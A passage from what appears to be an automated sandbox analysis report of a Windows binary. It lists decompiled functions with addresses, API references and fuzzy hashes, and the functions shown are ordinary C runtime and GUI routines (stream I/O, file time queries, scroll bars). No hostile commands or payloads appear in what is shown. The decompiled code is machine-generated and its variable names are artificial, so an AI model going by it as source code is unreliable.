                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ParentRectWindow$CtrlEqualException@8H_prolog3Throw
                  • String ID:
                  • API String ID: 295898562-0
                  • Opcode ID: 76ee73155ad020e3b4c5c133681f73e4c7979e435b41cc8632fa123f0ed9ab9c
                  • Instruction ID: ba48c219f6f1ad370f563cc23c44ecb0e53aac9f91ee0a06091b5b2abe8ce970
                  • Opcode Fuzzy Hash: 76ee73155ad020e3b4c5c133681f73e4c7979e435b41cc8632fa123f0ed9ab9c
                  • Instruction Fuzzy Hash: 0F61D5716001199FCB24DF29CD42BEA77B5BF85304F0401AEEA5ED7291DF789E818B58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004482FB, Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E004482FB(void* __ebx, signed int __ecx, void* __edx, signed int __edi, void* __esi, void* __eflags) {
				signed int _t52;
				void* _t54;
				void* _t58;
				intOrPtr _t61;
				signed int _t67;
				void* _t106;
				void* _t130;

				_t123 = __edi;
				_t122 = __edx;
				_t95 = __ebx;
				_push(0x58);
				E00431B04(E0044CB8F, __ebx, __edi, __esi);
				_t129 = __ecx;
				if( *( *(__ecx + 0x20)) == 0 ||  *( *(__ecx + 0x20)) >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) +  *( *(__ecx + 0x20))) {
					_t52 =  *(_t129 + 0x4c);
					__eflags = _t52;
					if(_t52 != 0) {
						__eflags =  *(_t129 + 0x3c);
						if(__eflags != 0) {
							E00447F37(_t130 - 0x2c);
							 *(_t130 - 4) =  *(_t130 - 4) & 0x00000000;
							while(1) {
								_push( *(_t129 + 0x4c));
								_t54 = E004499A8(_t95, _t122, _t123, _t129, __eflags);
								__eflags = _t54 - 0xffffffff;
								if(_t54 == 0xffffffff) {
									break;
								}
								E00448268(_t54, _t130 - 0x2c, _t122, _t129, 1, _t54);
								_t58 = E0044794F(E0044818F(_t130 - 0x2c, _t130 - 0x44));
								_t95 = _t58;
								_t61 = E0044794F(E0044818F(_t130 - 0x2c, _t130 - 0x64));
								_t122 =  *( *(_t129 + 0x3c));
								 *((intOrPtr*)(_t130 - 0x38)) = _t61;
								_t123 =  *((intOrPtr*)(_t130 - 0x18)) + _t58;
								_t67 =  *((intOrPtr*)( *( *(_t129 + 0x3c)) + 0x10))(_t129 + 0x44,  *((intOrPtr*)(_t130 - 0x38)),  *((intOrPtr*)(_t130 - 0x18)) + _t58, _t130 - 0x34, _t130 - 0x2d, _t130 - 0x2c, _t130 - 0x3c);
								__eflags = _t67;
								if(_t67 < 0) {
									break;
								} else {
									_t123 = 1;
									__eflags = _t67 - 1;
									if(_t67 <= 1) {
										_t106 = _t130 - 0x2c;
										__eflags =  *((intOrPtr*)(_t130 - 0x3c)) - _t130 - 0x2d;
										if( *((intOrPtr*)(_t130 - 0x3c)) != _t130 - 0x2d) {
											_t123 =  *((intOrPtr*)(_t130 - 0x18)) -  *((intOrPtr*)(_t130 - 0x34)) + E0044794F(E0044818F(_t106, _t130 - 0x54));
											while(1) {
												__eflags = _t123;
												if(_t123 <= 0) {
													goto L23;
												}
												_push( *(_t129 + 0x4c));
												_t123 = _t123 - 1;
												__eflags = _t123;
												_push( *((char*)(_t123 +  *((intOrPtr*)(_t130 - 0x34)))));
												E00442D62(_t95, _t122, _t123, _t129, _t123);
											}
											goto L23;
										} else {
											__eflags =  *((intOrPtr*)(_t130 - 0x34)) - E0044794F(E0044818F(_t106, _t130 - 0x5c));
											E004020E0(_t130 - 0x2c, _t130, 0,  *((intOrPtr*)(_t130 - 0x34)) - E0044794F(E0044818F(_t106, _t130 - 0x5c)));
											continue;
										}
									} else {
										__eflags = _t67 - 3;
										if(_t67 != 3) {
											break;
										} else {
											__eflags =  *((intOrPtr*)(_t130 - 0x18)) - 1;
											if(__eflags < 0) {
												continue;
											} else {
												E0043065F(_t95, _t83, _t130 - 0x2d, 1, E0044794F(E0044818F(_t130 - 0x2c, _t130 - 0x4c)), 1);
												L23:
												_t129 =  *(_t130 - 0x2d) & 0x000000ff;
											}
										}
									}
								}
								L19:
								E00402090(_t130 - 0x2c, _t130, 1, 0);
								goto L3;
							}
							__eflags = _t129;
							goto L19;
						} else {
							_t52 = E00447F77(__eflags, _t130 - 0x2d, _t52);
							__eflags = _t52;
							if(_t52 == 0) {
								goto L5;
							} else {
							}
						}
					} else {
						L5:
					}
				} else {
					 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) - 1;
					_t129 =  *(__ecx + 0x20);
					 *( *(__ecx + 0x20)) =  *( *(__ecx + 0x20)) + 1;
				}
				L3:
				return E00431B87(_t95, _t123, _t129);
			}










                  0x004482fb
                  0x004482fb
                  0x004482fb
                  0x004482fb
                  0x00448302
                  0x00448307
                  0x00448310
                  0x0044833a
                  0x0044833d
                  0x0044833f
                  0x00448346
                  0x0044834a
                  0x00448365
                  0x0044836a
                  0x00448435
                  0x00448435
                  0x00448438
                  0x0044843e
                  0x00448441
                  0x00000000
                  0x00000000
                  0x00448379
                  0x0044838c
                  0x00448394
                  0x004483a4
                  0x004483ac
                  0x004483ae
                  0x004483c1
                  0x004483cb
                  0x004483ce
                  0x004483d0
                  0x00000000
                  0x004483d2
                  0x004483d4
                  0x004483d5
                  0x004483d7
                  0x0044840d
                  0x00448410
                  0x00448413
                  0x00448473
                  0x0044848a
                  0x0044848a
                  0x0044848c
                  0x00000000
                  0x00000000
                  0x0044847a
                  0x0044847d
                  0x0044847d
                  0x00448482
                  0x00448483
                  0x00448489
                  0x00000000
                  0x00448415
                  0x00448428
                  0x00448430
                  0x00000000
                  0x00448430
                  0x004483d9
                  0x004483d9
                  0x004483dc
                  0x00000000
                  0x004483de
                  0x004483de
                  0x004483e1
                  0x00000000
                  0x004483e3
                  0x004483fd
                  0x0044848e
                  0x0044848e
                  0x0044848e
                  0x004483e1
                  0x004483dc
                  0x004483d7
                  0x0044844a
                  0x00448451
                  0x00000000
                  0x00448456
                  0x00448447
                  0x00000000
                  0x0044834c
                  0x00448351
                  0x00448358
                  0x0044835a
                  0x00000000
                  0x0044835c
                  0x0044835c
                  0x0044835a
                  0x00448341
                  0x00448341
                  0x00448341
                  0x00448322
                  0x00448325
                  0x00448327
                  0x0044832f
                  0x00448331
                  0x00448334
                  0x00448339

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 00448302
                  • _fgetc.LIBCMT ref: 00448438
                    • Part of subcall function 00448268: std::_String_base::_Xlen.LIBCPMT ref: 0044827E
                  • _memcpy_s.LIBCMT ref: 004483FD
                  • _ungetc.LIBCMT ref: 00448483
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
                  • String ID:
                  • API String ID: 9762108-0
                  • Opcode ID: e359a7babec4b74aa147af3afe432c765d51cbf57e171d97458ca66c2306e3e0
                  • Instruction ID: 6b1c3ca6e5d9ee48176232dde700f32502ceeb77f090096f39552806af3b4032
                  • Opcode Fuzzy Hash: e359a7babec4b74aa147af3afe432c765d51cbf57e171d97458ca66c2306e3e0
                  • Instruction Fuzzy Hash: 1351B1729046099FEB14EFB5C8529EEB3B9AF08314B50451FE452E7291EF38E905CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00449CB6, Relevance: 6.1, APIs: 4, Instructions: 137COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			E00449CB6(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0043681F(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E004401F2(_t90, _t98, _t100));
										_t74 = E0043FEB4(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E0044384A(_t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E004311E0(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E00431D3E(_t105);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E004367E9(_t90, 0, _t100);
					goto L4;
				}
			}





























                  0x00449cb6
                  0x00449cc6
                  0x00449cec
                  0x00000000
                  0x00449ccd
                  0x00449ccd
                  0x00449cd0
                  0x00449cd2
                  0x00449cf3
                  0x00449cf6
                  0x00449cf8
                  0x00000000
                  0x00000000
                  0x00449cfa
                  0x00449cff
                  0x00449d02
                  0x00449d05
                  0x00000000
                  0x00000000
                  0x00449d0a
                  0x00449d0e
                  0x00449d15
                  0x00449d18
                  0x00449d1b
                  0x00449d1d
                  0x00449d27
                  0x00449d1f
                  0x00449d22
                  0x00449d22
                  0x00449d2e
                  0x00449d30
                  0x00449df5
                  0x00000000
                  0x00449d36
                  0x00449d36
                  0x00449d39
                  0x00449d39
                  0x00449d3f
                  0x00449d70
                  0x00449d70
                  0x00449d73
                  0x00449dcc
                  0x00449dd3
                  0x00449dd6
                  0x00449e01
                  0x00449e01
                  0x00449e03
                  0x00000000
                  0x00449e07
                  0x00449dd8
                  0x00449ddb
                  0x00449dde
                  0x00449ddf
                  0x00449de2
                  0x00449de4
                  0x00449de6
                  0x00449de6
                  0x00000000
                  0x00449de4
                  0x00449d75
                  0x00449d77
                  0x00449d84
                  0x00449d84
                  0x00449d88
                  0x00449d8a
                  0x00449d8e
                  0x00449d90
                  0x00449d93
                  0x00449d93
                  0x00449d93
                  0x00449d95
                  0x00449d96
                  0x00449da0
                  0x00449da1
                  0x00449da6
                  0x00449da9
                  0x00449dac
                  0x00449e0f
                  0x00449e0f
                  0x00449e13
                  0x00000000
                  0x00449dae
                  0x00449dae
                  0x00449db0
                  0x00449db2
                  0x00449db4
                  0x00449db4
                  0x00449db6
                  0x00449db9
                  0x00449dbb
                  0x00449dbd
                  0x00000000
                  0x00449dbf
                  0x00449dbf
                  0x00449dbf
                  0x00000000
                  0x00449dbf
                  0x00449dbd
                  0x00449dac
                  0x00449d7a
                  0x00449d80
                  0x00449d82
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00449d82
                  0x00449d41
                  0x00449d44
                  0x00449d46
                  0x00000000
                  0x00000000
                  0x00449d48
                  0x00449dfd
                  0x00449dfd
                  0x00449dfd
                  0x00000000
                  0x00449dfd
                  0x00449d4e
                  0x00449d50
                  0x00449d52
                  0x00449d54
                  0x00449d54
                  0x00449d5c
                  0x00449d61
                  0x00449d64
                  0x00449d66
                  0x00449d69
                  0x00449d6b
                  0x00000000
                  0x00449ded
                  0x00449ded
                  0x00449ded
                  0x00000000
                  0x00449d36
                  0x00449d30
                  0x00449cd4
                  0x00449cd4
                  0x00449cd9
                  0x00449cda
                  0x00449cdb
                  0x00449cdc
                  0x00449cdd
                  0x00449cde
                  0x00449ce4
                  0x00000000
                  0x00449ce9

                  APIs
                  • __flush.LIBCMT ref: 00449D7A
                  • __fileno.LIBCMT ref: 00449D9A
                  • __locking.LIBCMT ref: 00449DA1
                  • __flsbuf.LIBCMT ref: 00449DCC
                    • Part of subcall function 00431D3E: __getptd_noexit.LIBCMT ref: 00431D3E
                    • Part of subcall function 004367E9: __decode_pointer.LIBCMT ref: 004367F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                  • String ID:
                  • API String ID: 3240763771-0
                  • Opcode ID: 020bed942e4c04a7e15a2f7b9b15e5e92c61f2d39ae54c637c43a2076e74116d
                  • Instruction ID: d56e0beb57539500931c0ee6668ff06c45bf35cc77231a46e76c3665acdb6bc3
                  • Opcode Fuzzy Hash: 020bed942e4c04a7e15a2f7b9b15e5e92c61f2d39ae54c637c43a2076e74116d
                  • Instruction Fuzzy Hash: AE41C271A00605ABFF24DF69C88559FB7B6EF80364F24852FE42597280E778DE41EB48
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042E41C, Relevance: 6.1, APIs: 4, Instructions: 131timeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E0042E41C(void* __ebx, void* __ecx, void* __eflags, signed int* _a4) {
				signed int _v8;
				signed int _v12;
				char _v20;
				struct _FILETIME _v28;
				struct _FILETIME _v36;
				char _v44;
				void* __edi;
				void* __esi;
				void* _t56;
				signed int* _t60;
				signed int* _t82;
				signed int* _t85;
				signed int* _t88;
				struct _FILETIME* _t94;
				void* _t106;
				CHAR* _t107;
				signed int* _t108;
				void* _t112;

				_t91 = __ecx;
				_t108 = _a4;
				_t106 = __ecx;
				E00431160(__ecx, _t108, 0, 0x128);
				E004048ED(__ebx, _t91, _t106, _t108,  &(_t108[8]), 0x104,  *(_t106 + 0xc), 0xffffffff);
				_t56 =  *(_t106 + 4);
				_t112 = _t56 -  *0x4542f8; // 0xffffffff
				if(_t112 == 0) {
					L20:
					return 1;
				}
				_t94 =  &_v20;
				if(GetFileTime(_t56, _t94,  &_v28,  &_v36) != 0) {
					_t60 =  &_v12;
					__imp__GetFileSizeEx( *(_t106 + 4), _t60);
					if(_t60 == 0) {
						goto L2;
					}
					_t108[6] = _v12;
					_t108[7] = _v8;
					_t107 =  *(_t106 + 0xc);
					if( *((intOrPtr*)(_t107 - 0xc)) != 0) {
						_t108[8] = (_t94 & 0xffffff00 | GetFileAttributesA(_t107) == 0xffffffff) - 0x00000001 & _t64;
					} else {
						_t108[8] = 0;
					}
					if(E0042DF81( &_v20) == 0) {
						 *_t108 =  *_t108 & 0x00000000;
						_t108[1] = _t108[1] & 0x00000000;
					} else {
						_t88 = E0042E0A4( &_v44,  &_v20, 0xffffffff);
						 *_t108 =  *_t88;
						_t108[1] = _t88[1];
					}
					if(E0042DF81( &_v28) == 0) {
						_t108[4] = 0;
						_t108[5] = 0;
					} else {
						_t85 = E0042E0A4( &_v44,  &_v28, 0xffffffff);
						_t108[4] =  *_t85;
						_t108[5] = _t85[1];
					}
					if(E0042DF81( &_v36) == 0) {
						_t108[2] = 0;
						_t108[3] = 0;
					} else {
						_t82 = E0042E0A4( &_v44,  &_v36, 0xffffffff);
						_t108[2] =  *_t82;
						_t108[3] = _t82[1];
					}
					if(( *_t108 | _t108[1]) == 0) {
						 *_t108 = _t108[2];
						_t108[1] = _t108[3];
					}
					if((_t108[4] | _t108[5]) == 0) {
						_t108[4] = _t108[2];
						_t108[5] = _t108[3];
					}
					goto L20;
				}
				L2:
				return 0;
			}





















                  0x0042e41c
                  0x0042e425
                  0x0042e431
                  0x0042e433
                  0x0042e446
                  0x0042e44b
                  0x0042e451
                  0x0042e457
                  0x0042e573
                  0x00000000
                  0x0042e575
                  0x0042e465
                  0x0042e472
                  0x0042e47b
                  0x0042e482
                  0x0042e48a
                  0x00000000
                  0x00000000
                  0x0042e48f
                  0x0042e495
                  0x0042e498
                  0x0042e49f
                  0x0042e4b8
                  0x0042e4a1
                  0x0042e4a1
                  0x0042e4a1
                  0x0042e4c6
                  0x0042e4e2
                  0x0042e4e5
                  0x0042e4c8
                  0x0042e4d1
                  0x0042e4d8
                  0x0042e4dd
                  0x0042e4dd
                  0x0042e4f4
                  0x0042e515
                  0x0042e518
                  0x0042e4f6
                  0x0042e4ff
                  0x0042e506
                  0x0042e50c
                  0x0042e50c
                  0x0042e526
                  0x0042e547
                  0x0042e54a
                  0x0042e528
                  0x0042e531
                  0x0042e538
                  0x0042e53e
                  0x0042e53e
                  0x0042e552
                  0x0042e557
                  0x0042e55c
                  0x0042e55c
                  0x0042e565
                  0x0042e56a
                  0x0042e570
                  0x0042e570
                  0x00000000
                  0x0042e565
                  0x0042e474
                  0x00000000

                  APIs
                  • _memset.LIBCMT ref: 0042E433
                    • Part of subcall function 004048ED: __cftof.LIBCMT ref: 004048FE
                  • GetFileTime.KERNEL32(?,?,?,?), ref: 0042E46A
                  • GetFileSizeEx.KERNEL32(?,?), ref: 0042E482
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: File$SizeTime__cftof_memset
                  • String ID:
                  • API String ID: 2749391713-0
                  • Opcode ID: b88261758d1912e9b31fa23ff3f45a79f7e15a6fac39cb4cba046ca838f71c23
                  • Instruction ID: 59e65bddb89cb08a79970d6891d001c7148b8aeecaf6f385f6588ba968201997
                  • Opcode Fuzzy Hash: b88261758d1912e9b31fa23ff3f45a79f7e15a6fac39cb4cba046ca838f71c23
                  • Instruction Fuzzy Hash: 5D517071A00615AFCB20DF66D840D9BB7F4BF08324B448A2EE5A6D3690E734E545CB68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041C15A, Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E0041C15A(void* __ecx, int _a4, int _a8, int _a12) {
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr* _t71;
				intOrPtr _t78;
				intOrPtr* _t81;
				signed short _t100;
				void* _t109;
				signed int _t112;
				int* _t113;
				void* _t117;

				_t117 = __ecx;
				_push(0);
				if( *((intOrPtr*)(__ecx + 0x10c)) != 0) {
					_t62 =  *((intOrPtr*)(__ecx + 0xb0));
					_t112 = _a4 * 0x28;
					 *(__ecx + 0x118) = 1;
					 *((intOrPtr*)(_t62 + 0x20)) =  *((intOrPtr*)(_t62 + _t112 + 0x20));
					 *((intOrPtr*)(_t62 + 0x24)) =  *((intOrPtr*)(_t62 + _t112 + 0x24));
					_t63 =  *((intOrPtr*)(__ecx + 0xb0));
					 *((intOrPtr*)(_t63 + 0x10)) =  *((intOrPtr*)(_t63 + _t112 + 0x10));
					 *((intOrPtr*)(_t63 + 0x14)) =  *((intOrPtr*)(_t63 + _t112 + 0x14));
					_push( *((intOrPtr*)(__ecx + 0x114)) + _a4);
					E0041BAC8(__ecx);
					E0041B7FA(__ecx, __eflags, 0);
					_t113 = _t112 +  *((intOrPtr*)(_t117 + 0xb0)) + 0x18;
					_a8 = MulDiv(_a8,  *_t113, _t113[1]);
					_a12 = MulDiv(_a12,  *_t113, _t113[1]);
					_t71 =  *((intOrPtr*)(_t117 + 0xb0));
					_a12 = _a12 +  *((intOrPtr*)(_t71 + 4));
					_t59 =  &_a8;
					 *_t59 = _a8 +  *_t71;
					__eflags =  *_t59;
					return E004195B7(_t117, _t109, _a8, _a12);
				}
				 *(__ecx + 0x118) =  *(__ecx + 0x108);
				ShowScrollBar( *(__ecx + 0x20), 0, ??);
				_t78 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t117 + 0x134)))) + 0x74));
				_t100 =  *(_t78 + 0x1e) & 0x0000ffff;
				if(_t100 >= 0x8000) {
					L3:
					_a4 = 0;
					L4:
					ShowScrollBar( *(_t117 + 0x20), 1, _a4);
					if(_a4 != 0) {
						_t81 =  *((intOrPtr*)(_t117 + 0x134));
						_v28 = 3;
						_v24 =  *( *((intOrPtr*)( *_t81 + 0x74)) + 0x1c) & 0x0000ffff;
						_v20 =  *( *((intOrPtr*)( *_t81 + 0x74)) + 0x1e) & 0x0000ffff;
						_v16 = 1;
						if(E0040CE62(_t117, 1,  &_v32, 0) == 0) {
							E0040DAD4(_t117, 1, _v24, _v20, 0);
						}
					}
					return E0041BAC8(_t117,  *((intOrPtr*)(_t117 + 0x114)), 1);
				}
				_a4 = 1;
				if((_t100 & 0x0000ffff) - ( *(_t78 + 0x1c) & 0x0000ffff) <= 0x7fff) {
					goto L4;
				}
				goto L3;
			}


















                  0x0041c166
                  0x0041c169
                  0x0041c170
                  0x0041c233
                  0x0041c239
                  0x0041c23c
                  0x0041c24a
                  0x0041c251
                  0x0041c254
                  0x0041c25e
                  0x0041c265
                  0x0041c273
                  0x0041c274
                  0x0041c27c
                  0x0041c28d
                  0x0041c29b
                  0x0041c2a8
                  0x0041c2ab
                  0x0041c2b6
                  0x0041c2bc
                  0x0041c2bc
                  0x0041c2bc
                  0x00000000
                  0x0041c2c4
                  0x0041c186
                  0x0041c18c
                  0x0041c196
                  0x0041c199
                  0x0041c1a5
                  0x0041c1bf
                  0x0041c1bf
                  0x0041c1c2
                  0x0041c1ca
                  0x0041c1cf
                  0x0041c1d1
                  0x0041c1d7
                  0x0041c1e7
                  0x0041c1f3
                  0x0041c201
                  0x0041c20b
                  0x0041c217
                  0x0041c217
                  0x0041c20b
                  0x00000000
                  0x0041c226
                  0x0041c1b0
                  0x0041c1bd
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • ShowScrollBar.USER32(?,00000000,00000000), ref: 0041C18C
                  • ShowScrollBar.USER32(?,00000001,?), ref: 0041C1CA
                  • MulDiv.KERNEL32(?,?,?), ref: 0041C299
                  • MulDiv.KERNEL32(?,?,?), ref: 0041C2A6
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ScrollShow
                  • String ID:
                  • API String ID: 3611344627-0
                  • Opcode ID: 2d2a39918026b51e9e54ad1d2bd2ee466984f5a2fb341d35fe6ca703a947cfa3
                  • Instruction ID: bf8b80c232955c01bad76bb884e3b34b9d27a71a0442df1df84a360057f59a7a
                  • Opcode Fuzzy Hash: 2d2a39918026b51e9e54ad1d2bd2ee466984f5a2fb341d35fe6ca703a947cfa3
                  • Instruction Fuzzy Hash: CF416674600604AFCB15DF69C880AAABBF6FF48304F00456EF85A9B361D774E990DF94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042BCDF, Relevance: 6.1, APIs: 4, Instructions: 107windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E0042BCDF(void* __ebx, signed int __ecx, void* __edx, int __edi, void* __esi, void* __eflags) {
				signed int _t44;
				signed int _t46;
				long _t54;
				char* _t60;
				void* _t65;
				signed int _t72;
				intOrPtr _t73;
				char* _t80;
				signed int _t83;
				signed int _t91;
				char* _t93;
				void* _t94;

				_t89 = __edi;
				_t88 = __edx;
				_push(8);
				E00431A9B(E0044C7FD, __ebx, __edi, __esi);
				_t91 = __ecx;
				 *(_t94 - 0x14) = 0;
				if( *((intOrPtr*)(__ecx + 0x78)) != 1) {
					_t72 =  *(__ecx + 0x74);
					__eflags =  *(_t72 + 0x34) & 0x00080000;
					if(( *(_t72 + 0x34) & 0x00080000) == 0) {
						L14:
						_t44 =  *(_t91 + 0x1d4);
						__eflags = _t44;
						if(_t44 == 0) {
							__eflags =  *(_t72 + 0x3a);
							if(__eflags != 0) {
								_t91 = _t72;
								_t73 =  *((intOrPtr*)(_t94 + 8));
								goto L21;
							} else {
								_t73 =  *((intOrPtr*)(_t94 + 8));
								_push(0x44f0f5);
							}
						} else {
							_t73 =  *((intOrPtr*)(_t94 + 8));
							__eflags =  *(_t44 + 0x3a);
							if(__eflags != 0) {
								_t91 = _t44;
								L21:
								_t46 = ( *(_t91 + 0x3a) & 0x0000ffff) +  *((intOrPtr*)(_t91 + 0x1c));
								__eflags = _t46;
								_push(_t46);
							} else {
								_push(0x44f0f5);
							}
						}
						E00406039(0, _t73, _t88, _t89, _t91, __eflags);
					} else {
						__eflags =  *(__ecx + 0x20);
						if( *(__ecx + 0x20) == 0) {
							goto L14;
						} else {
							E004014C0(_t94 - 0x10, __edx);
							_t89 = 0x104;
							 *((intOrPtr*)(_t94 - 4)) = 3;
							 *(_t94 - 0x14) = E004014F0(_t94 - 0x10, 0x104);
							_t54 = SendMessageA( *(E0040EE3C(0, _t94 - 0x10, GetParent( *(_t91 + 0x20))) + 0x20), 0x464, 0x104,  *(_t94 - 0x14));
							E0040A356(_t94 - 0x10, 0xffffffff);
							__eflags = _t54;
							if(__eflags < 0) {
								goto L9;
							} else {
								goto L5;
							}
							L24:
						}
					}
				} else {
					E004014C0(_t94 - 0x10, __edx);
					 *((intOrPtr*)(_t94 - 4)) = 0;
					_t83 = _t91;
					_push(_t94 - 0x14);
					_t97 =  *(_t91 + 0x20);
					if( *(_t91 + 0x20) == 0) {
